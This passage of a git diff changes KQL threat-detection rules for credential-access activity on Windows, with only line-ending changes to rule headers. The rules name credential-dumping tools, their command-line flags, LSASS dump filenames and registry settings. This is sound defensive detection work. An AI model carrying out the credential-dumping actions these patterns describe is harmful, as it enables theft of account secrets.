+// MITRE Tactic: Credential Access +// Tags: attack.credential-access + +DeviceFileEvents | where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql index b60b4fe2..c0800897 100644 --- a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql +++ b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump -// Author: SecurityAura -// Date: 2022-11-16 -// Level: high -// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 - -DeviceFileEvents +// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump +// Author: SecurityAura +// Date: 2022-11-16 +// Level: high +// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql index 87a112ad..6a049c08 100644 --- a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql +++ b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Pypykatz Credentials Dumping Activity -// Author: frack113 -// Date: 2022-01-05 -// Level: high -// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 - -DeviceProcessEvents +// Title: HackTool - Pypykatz Credentials Dumping Activity +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql index a002049e..38dbfc39 100644 --- a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql +++ b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Quarks PwDump Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-05 -// Level: high -// Description: Detects usage of the Quarks PwDump tool via commandline arguments -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Quarks PwDump Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Quarks PwDump tool via commandline arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql index fd78877b..37d91a8b 100644 --- a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql +++ b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql @@ -1,10 +1,10 @@ -// Title: HackTool - QuarksPwDump Dump File -// Author: Florian Roth (Nextron Systems) -// Date: 2018-02-10 -// Level: critical -// Description: Detects a dump file written by QuarksPwDump password dumper -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 - -DeviceFileEvents +// Title: HackTool - QuarksPwDump Dump File +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-10 +// Level: critical +// Description: Detects a dump file written by QuarksPwDump password dumper +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceFileEvents | where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql index b6c71489..fe699bbb 100644 --- a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql +++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - RemoteKrbRelay Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-27 -// Level: high -// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1558.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - RemoteKrbRelay Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql index 642a7667..9b37a669 100644 --- a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql +++ b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SafetyKatz Dump Indicator -// Author: Markus Neis -// Date: 2018-07-24 -// Level: high -// Description: Detects default lsass dump filename generated by SafetyKatz. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Rare legitimate files with similar filename structure - -DeviceFileEvents +// Title: HackTool - SafetyKatz Dump Indicator +// Author: Markus Neis +// Date: 2018-07-24 +// Level: high +// Description: Detects default lsass dump filename generated by SafetyKatz. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare legitimate files with similar filename structure + +DeviceFileEvents | where FolderPath endswith "\\Temp\\debug.bin" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql index da8d62a6..0ee7f2e0 100644 --- a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql +++ b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SafetyKatz Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-20 -// Level: critical -// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - SafetyKatz Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-20 +// Level: critical +// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql index 84427743..75abef80 100644 --- a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql +++ b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SecurityXploded Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2018-12-19 -// Level: critical -// Description: Detects the execution of SecurityXploded Tools -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - SecurityXploded Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2018-12-19 +// Level: critical +// Description: Detects the execution of SecurityXploded Tools +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql index a3e59eb1..16e14045 100644 --- a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql +++ b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Typical HiveNightmare SAM File Export -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-23 -// Level: high -// Description: Detects files written by the different tools that exploit HiveNightmare -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934 -// False Positives: -// - Files that accidentally contain these strings - -DeviceFileEvents +// Title: HackTool - Typical HiveNightmare SAM File Export +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-23 +// Level: high +// Description: Detects files written by the different tools that exploit HiveNightmare +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934 +// False Positives: +// - Files that accidentally contain these strings + +DeviceFileEvents | where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql index 9d2c5df5..10e49f69 100644 --- a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql +++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - WinPwn Execution -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-12-04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 - -DeviceProcessEvents +// Title: HackTool - WinPwn Execution +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-12-04 +// Level: high +// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 + +DeviceProcessEvents | where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql index 187ef0d6..4b71e6fc 100644 --- a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql +++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql @@ -1,11 +1,11 @@ -// Title: Interesting Service Enumeration Via Sc.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-02-12 -// Level: low -// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". -// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access - -DeviceProcessEvents +// Title: Interesting Service Enumeration Via Sc.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-02-12 +// Level: low +// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". +// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access + +DeviceProcessEvents | where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql index 5581b8b5..b8ff3db6 100644 --- a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql +++ b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql @@ -1,12 +1,12 @@ -// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) -// Author: Thomas Patzke -// Date: 2019-01-16 -// Level: medium -// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 -// False Positives: -// - NTDS maintenance - -DeviceProcessEvents +// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) +// Author: Thomas Patzke +// Date: 2019-01-16 +// Level: medium +// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - NTDS maintenance + +DeviceProcessEvents | where FolderPath endswith "\\ntdsutil.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql index 88b329e7..3e0f8ef2 100644 --- a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql +++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql @@ -1,12 +1,12 @@ -// Title: Loaded Module Enumeration Via Tasklist.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-02-12 -// Level: medium -// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". -// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. -// In order to dump the process memory or perform other nefarious actions. -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access - -DeviceProcessEvents +// Title: Loaded Module Enumeration Via Tasklist.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-02-12 +// Level: medium +// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". +// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. +// In order to dump the process memory or perform other nefarious actions. +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access + +DeviceProcessEvents | where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql index 7a57b6a5..43d11d20 100644 --- a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql +++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql @@ -1,12 +1,12 @@ -// Title: LSASS Dump Keyword In CommandLine -// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-24 -// Level: high -// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: LSASS Dump Keyword In CommandLine +// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: high +// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql index 784863db..ed914fe8 100644 --- a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql +++ b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql @@ -1,12 +1,12 @@ -// Title: Lsass Full Dump Request Via DumpType Registry Settings -// Author: @pbssubhash -// Date: 2022-12-08 -// Level: high -// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Legitimate application that needs to do a full dump of their process - -DeviceRegistryEvents +// Title: Lsass Full Dump Request Via DumpType Registry Settings +// Author: @pbssubhash +// Date: 2022-12-08 +// Level: high +// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate application that needs to do a full dump of their process + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql index 3caa51d8..468deece 100644 --- a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql +++ b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql @@ -1,12 +1,12 @@ -// Title: LSASS Process Dump Artefact In CrashDumps Folder -// Author: @pbssubhash -// Date: 2022-12-08 -// Level: high -// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Rare legitimate dump of the process by the operating system due to a crash of lsass - -DeviceFileEvents +// Title: LSASS Process Dump Artefact In CrashDumps Folder +// Author: @pbssubhash +// Date: 2022-12-08 +// Level: high +// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare legitimate dump of the process by the operating system due to a crash of lsass + +DeviceFileEvents | where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\" \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql index d75b0ba2..8c2cf94b 100644 --- a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql +++ b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql @@ -1,12 +1,12 @@ -// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-10-19 -// Level: high -// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless - -DeviceFileEvents +// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-10-19 +// Level: high +// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql index 51bdd5d6..04e5d0d0 100644 --- a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql +++ b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql @@ -1,10 +1,10 @@ -// Title: LSASS Process Memory Dump Files -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-15 -// Level: high -// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceFileEvents +// Title: LSASS Process Memory Dump Files +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-15 +// Level: high +// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents | where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp") \ No newline at end of file diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql index c7374d0b..3ff548be 100644 --- a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql +++ b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql @@ -1,10 +1,10 @@ -// Title: LSASS Process Reconnaissance Via Findstr.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-12 -// Level: high -// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006 - -DeviceProcessEvents +// Title: LSASS Process Reconnaissance Via Findstr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents | where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass") \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql index 49aed8f5..8c413bbd 100644 --- a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql +++ b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql @@ -1,10 +1,10 @@ -// Title: Microsoft IIS Connection Strings Decryption -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-28 -// Level: high -// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 - -DeviceProcessEvents +// Title: Microsoft IIS Connection Strings Decryption +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-28 +// Level: high +// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents | where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql index 36361a87..3d4a95cf 100644 --- a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql +++ b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql @@ -1,10 +1,10 @@ -// Title: Microsoft IIS Service Account Password Dumped -// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea) -// Date: 2022-11-08 -// Level: high -// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 - -DeviceProcessEvents +// Title: Microsoft IIS Service Account Password Dumped +// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea) +// Date: 2022-11-08 +// Level: high +// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents | where (ProcessCommandLine contains "list " 